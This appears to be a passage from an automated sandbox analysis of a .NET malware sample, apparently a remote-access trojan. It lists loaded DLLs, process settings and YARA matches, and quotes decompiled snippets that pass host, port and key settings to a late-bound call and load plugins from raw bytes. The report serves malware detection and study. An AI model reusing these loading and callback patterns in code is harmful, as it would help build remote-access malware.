Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: Plugin System.AppDomain.Load(byte[]) |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: Memory System.AppDomain.Load(byte[]) |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Messages.cs |
.Net Code: Memory |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: Yara match |
File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR |
Source: Yara match |
File source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR |